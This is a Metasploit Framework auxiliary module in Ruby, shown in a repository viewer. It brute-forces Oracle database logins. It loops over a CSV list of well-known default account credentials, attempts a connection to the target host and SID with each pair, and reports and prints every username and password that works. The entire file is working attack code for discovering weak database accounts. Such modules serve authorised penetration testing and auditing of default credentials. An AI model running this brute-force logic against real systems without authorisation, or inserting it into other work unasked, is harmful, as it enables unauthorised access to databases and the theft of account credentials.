root / modules / auxiliary / admin / oracle / oracle_login.rb @ master
History | View | Annotate | Download (2 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/
|
| 10 |
##
|
| 11 |
|
| 12 |
require 'msf/core'
|
| 13 |
require 'csv'
|
| 14 |
|
| 15 |
class Metasploit3 < Msf::Auxiliary |
| 16 |
|
| 17 |
include Msf::Auxiliary::Report |
| 18 |
include Msf::Exploit::ORACLE |
| 19 |
|
| 20 |
def initialize(info = {}) |
| 21 |
super(update_info(info,
|
| 22 |
'Name' => 'Oracle Account Discovery', |
| 23 |
'Description' => %q{ |
| 24 |
This module uses a list of well known default authentication credentials |
| 25 |
to discover easily guessed accounts. |
| 26 |
},
|
| 27 |
'Author' => [ 'MC' ], |
| 28 |
'License' => MSF_LICENSE, |
| 29 |
'Version' => '$Revision$', |
| 30 |
'References' =>
|
| 31 |
[ |
| 32 |
[ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv' ], |
| 33 |
[ 'URL', 'http://seclists.org/fulldisclosure/2009/Oct/261' ], |
| 34 |
], |
| 35 |
'DisclosureDate' => 'Nov 20 2008')) |
| 36 |
|
| 37 |
register_options( |
| 38 |
[ |
| 39 |
OptString.new('CSVFILE', [ false, 'The file that contains a list of default accounts.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'oracle_default_passwords.csv')]), |
| 40 |
], self.class)
|
| 41 |
|
| 42 |
deregister_options('DBUSER','DBPASS') |
| 43 |
|
| 44 |
end
|
| 45 |
|
| 46 |
def run |
| 47 |
return if not check_dependencies |
| 48 |
|
| 49 |
list = datastore['CSVFILE']
|
| 50 |
|
| 51 |
print_status("Starting brute force on #{datastore['RHOST']}:#{datastore['RPORT']}...")
|
| 52 |
|
| 53 |
fd = CSV.foreach(list) do |brute| |
| 54 |
|
| 55 |
datastore['DBUSER'] = brute[2].downcase |
| 56 |
datastore['DBPASS'] = brute[3].downcase |
| 57 |
|
| 58 |
begin
|
| 59 |
connect |
| 60 |
disconnect |
| 61 |
rescue ::OCIError => e |
| 62 |
else
|
| 63 |
if (not e) |
| 64 |
report_auth_info( |
| 65 |
:host => "#{datastore['RHOST']}", |
| 66 |
:port => "#{datastore['RPORT']}", |
| 67 |
:sname => 'oracle', |
| 68 |
:user => "#{datastore['SID']}/#{datastore['DBUSER']}", |
| 69 |
:pass => "#{datastore['DBPASS']}", |
| 70 |
:active => true |
| 71 |
) |
| 72 |
print_status("Found user/pass of: #{datastore['DBUSER']}/#{datastore['DBPASS']} on #{datastore['RHOST']} with sid #{datastore['SID']}")
|
| 73 |
end
|
| 74 |
end
|
| 75 |
end
|
| 76 |
end
|
| 77 |
end
|